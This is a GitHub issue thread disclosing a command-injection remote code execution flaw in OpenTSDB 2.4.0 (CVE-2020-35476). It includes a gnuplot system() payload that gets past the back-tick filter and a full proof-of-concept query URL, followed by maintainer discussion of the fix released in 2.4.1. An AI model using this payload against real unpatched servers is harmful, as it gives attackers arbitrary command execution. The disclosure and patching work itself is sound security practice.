OpenTSDB 2.4.0 Remote Code Execution

[NightRang3r]

During a Pentest we found a remote code execution vulnerability in OpenTSDB 2.4.0 and below using command injection in the yrange parameter (other parameters might be vulnerable as well)

When passing the payload via one of the parameters it is written to a gnuplot file in the /tmp directory and the gnuplot file is executed by OpenTSDB via the /src/mygnuplot.sh shell script.

There was an attempt to block command injections by blocking back-ticks but we were able to bypass it:

/src/tsd/GraphHandler.java:

private static String popParam(final Map<String, List<String>> querystring,
                                         final String param) {
        final List<String> params = querystring.remove(param);
        if (params == null) {
          return null;
        }
        final String given = params.get(params.size() - 1);
        // TODO - far from perfect, should help a little.
        if *(given.contains("`") || given.contains("%60") || 
            given.contains("&#96;")) *{
          throw new BadRequestException("Parameter " + param + " contained a "
              + "back-tick. That's a no-no.");
        }
        return given;
      }

Bypass Payload:

[33:system('touch/tmp/poc.txt')]

PoC:

http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

The gnuplot file created in the temp directory by OpenTSDB would look something like this:

set term png small size 1516,644
set xdata time
set timefmt "%s"
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right
set output "/tmp/d705ba5b.png"
set xrange ["972086400":"1603641404"]
set format x "%Y/%m/%d"
set grid
set style data linespoint
set key right box
set ylabel ""
*set yrange [33:system('touch /tmp/poc.txt')]*
plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}"

When executed by OpenTSDB mygnuplot.sh the poc.txt file will be written to the temp directory.

This vulnerability has been discovered by Aviad Golan and Shai rod

[mynameiswillporter]

I have confirmed this as well.

[mynameiswillporter]

@NightRang3r have you filed a CVE for this?

[NightRang3r]

@mynameiswillporter Yes

[NightRang3r]

@mynameiswillporter CVE-2020-35476

[kofhearts]

How do you verify for proof of concept that that payload worked? As the poc.txt is downloaded on the server side isn't it?

[OS-WS]

Hi, was this issue fixed?

[johann8384]

@NightRang3r @aviadgolan Nice find, I didn't see this issue when it was opened. @OS-WS No, I don't think it has been fixed yet.

[aviadgolan]

☺️ Keep up the good work..

[manolama]

Thanks for the find folks, I knew that little patch wouldn't work for everything. 3.0 doesn't have gnuplot so that's good. Let me see how I can fix this one up for 2.x.

PLEASE NOTE: This vulnerability would affect all versions of TSDB prior to a 2.4.1 release.

[manolama]

@NightRang3r @aviadgolan mind taking a look at #2127 let me know if it's ok please? Thanks.

[mcauto]

Is it completed?

[manolama]

@mcauto It's in the main branch, yes. No release yet though.

[manolama]

Released in 2.4.1